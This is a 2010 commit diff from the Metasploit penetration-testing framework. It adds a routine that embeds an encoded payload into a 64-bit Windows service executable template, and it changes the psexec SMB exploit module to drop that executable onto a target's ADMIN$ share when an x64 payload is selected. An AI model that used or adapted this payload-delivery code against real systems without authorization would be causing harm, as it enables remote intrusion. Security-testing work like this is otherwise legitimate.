allow x64 payloads to be used with psexec

git-svn-id: file:///home/svn/framework3/trunk@9565 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-21 03:49:39 +00:00 · 2010-06-21 03:49:39 +00:00 · 2c91164494
parent 33086db682
commit 2c91164494
2 changed files with 26 additions and 2 deletions
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@ -351,6 +351,26 @@ require 'metasm'
 		return pe
 	end
 	def self.to_win64pe_service(framework, code, name='SERVICENAME')
 		pe = ''
 		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service_x64.exe"), "rb")
 		pe = fd.read(fd.stat.size)
 		fd.close
 		bo = pe.index('PAYLOAD:')
 		raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
 		pe[bo, 8192] = [code].pack("a8192")
 		bo = pe.index('SERVICENAME')
 		raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
 		pe[bo, 11] = [name].pack('a11')
 		pe[136, 4] = [rand(0x100000000)].pack('V')
 		return pe
 	end
 	def self.to_win32pe_dll(framework, code)
 		pe = ''
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         =>
 				[
-					'hdm'
+					'hdm',
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
@ -127,7 +127,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		filename = rand_text_alpha(8) + ".exe"
 		simple.connect("ADMIN$")
 		fd = simple.open("\\#{filename}", 'rwct')
-		fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
+		if (datastore['PAYLOAD'].include? 'x64')
 			fd << Msf::Util::EXE.to_win64pe_service(framework,payload.encoded,rand_text_alpha(8))
 		else
 			fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
 		end
 		fd.close
 		print_status("Created \\#{filename}...")